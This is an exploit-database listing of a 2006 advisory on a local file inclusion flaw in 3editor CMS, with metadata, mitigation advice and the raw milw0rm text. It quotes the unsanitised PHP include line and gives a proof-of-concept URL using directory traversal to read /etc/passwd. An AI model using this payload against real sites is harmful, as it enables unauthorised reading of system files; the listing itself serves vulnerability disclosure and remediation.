header-logo
Suggest Exploit
vendor:
3editor CMS
by:
Dr Max Virus
7,5
CVSS
HIGH
Local File Include
98
CWE
Product Name: 3editor CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

3editor CMS (index.php) Local File Include Exploit

In file index.php, the variable of page is not sanitized, allowing an attacker to exploit the vulnerability when register_globals is set to on. The POC example is http://[target]/[path]/index.php?page=../../../../../etc/passwd.

Mitigation:

Sanitize user input and ensure that register_globals is set to off.
Source

Exploit-DB raw data:

************************************************************************     
*script Name: 3editor CMS (index.php) Local File Include Exploit       *
*Download:http://www.matteolucarelli.net/3editor/index.htm             *
*[Author      : Dr Max Virus                                           *
*[Contact     :drmaxvirus@w.cn                                         *
************************************************************************
*Bug & Problem                                                         *
*In file index.php Let's Take a look;                                  *
*if (!isset($_GET['page'])) include('phplib/treeedit.php');            *
*else include('phplib/'.$_GET['page']);                                *
************************************************************************
*As We can see the variable of page is not sanitized So attacker can   *
*apply his bug when:                                                   *
*register_globals=on                                                   *
************************************************************************
*POC Example:                                                          *
*http://[target]/[path]/index.php?page=../../../../../etc/passwd       *
************************************************************************
*Thx:str0ke -koray -ajann -Timq -r0ut3r -All my Friends                *
*special gr33ts:AsianEagle -The master -Kacper -Hotturk                *
************************************************************************

# milw0rm.com [2006-12-22]

Navigation

Suggest Exploit

Services By CQR